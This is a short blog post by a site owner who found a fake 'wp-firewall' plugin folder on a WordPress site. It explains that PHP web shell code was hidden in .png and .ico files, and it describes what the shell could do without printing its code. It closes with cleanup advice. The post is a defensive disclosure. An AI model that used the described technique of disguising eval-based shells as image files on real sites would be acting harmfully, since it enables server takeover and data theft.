WordPress wp-firewall web shell hack

Recently I discovered some interesting files on a WordPress website, these files were inside a folder called “wp-firewall” however in the WordPress plugins listing there was no such thing. Inspection of this folder revealed something I couldn’t find much about around the internet.

This is the structure of the wp-firewall folder:

[dir] wp-firewall/

— wp_head_info.php

[dir] favicon/

—— background.png

—— favicon.ico

Upon closer inspection, this doesn’t look like a WordPress plugin at all it seems to be more of a hack. Opening the wp_head_info.php file locally, revealed the following code:

Turns out these two “image” files are actually containers of some nasty PHP code, the background.png being a web shell, allowing an attacker to execute any command they like on your server. This used the eval() function of PHP several times.

I don’t want to post the contents of the file here, so I’ve created a pastebin.
If you look through it you can see it’s a complete package for brute force attempts, loading files, dumping data, executing sql queries and sending data to somewhere.
favicon.ico is some base64 encrypted code that would not decrypt using unPHP. [pastebin]
No idea what this one does quite yet.

If you find this

If you happen to find something like this on your server, you’re at high risk. As a web shell can execute anything, the chances are that you have many other hacks also on the server and the only way to be 100% sure of removal is to wipe everything. Unfortunately this is your best option. You can try to save files, but it’s best to be certain they’re not infected in any way.